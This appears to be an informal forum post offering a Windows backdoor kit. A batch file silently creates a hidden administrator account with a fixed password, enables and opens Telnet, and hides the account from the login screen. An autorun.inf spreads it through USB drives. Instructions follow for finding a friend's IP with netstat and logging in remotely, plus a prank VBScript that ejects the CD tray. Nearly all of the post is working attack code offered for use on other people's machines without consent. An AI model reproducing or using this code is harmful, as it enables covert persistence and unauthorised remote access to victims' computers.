instal.bat
Code:
@echo OFF net user IE_USR 123456 /add net localgroup administrators IE_USR /add net localgroup “remote desktop users” IE_USR /add sc config tlntsvr start= auto netsh firewall set allowedprogram %windir%\system32\tlntsvr.exe iexplorer enable sc start tlntsvr reg add “HKLM\software\microsoft\windows NT\CurrentVersion\winlogon\specialaccounts\UserList” /v IE_USR /t REG_DWORD /d 0
Now u can make this file to spread from one machine to another according to ur own method like i use to spread this file as a autoplay program in pen drives. Here i m providing u the code for autoplaying just put these two files in pen drive and u r work is done.
autorun.inf
Code:
[autorun] open=instal.bat
it will do all the work for u then u meet ur frnd online on yahoo msgr and
use start>run>netstat -n 4 [press enter] to find his ip address. After getting the ipaddress
goto start>run>telnet ipaddress [press enter] now press y and then use these login detail to get login
Code:
username: IE_USR password: 123456
You can create more scripts and make fun...
Example: This script uses to open the cd rom
Code:
Set wmp = CreateObject("WMPlayer.OCX.7")
Set cdroms = wmp.cdromCollection
For j=1 to 3 'this is variable set how much time wants to open and close
If cdroms.Count >= 1 then
For i = 0 to cdroms.Count - 1
cdroms.Item(i).Eject
WScript.Sleep 1000
cdroms.Item(i).Eject
Next
End If
Next
Just run this script to ur remote mechine and hav fun!!!!
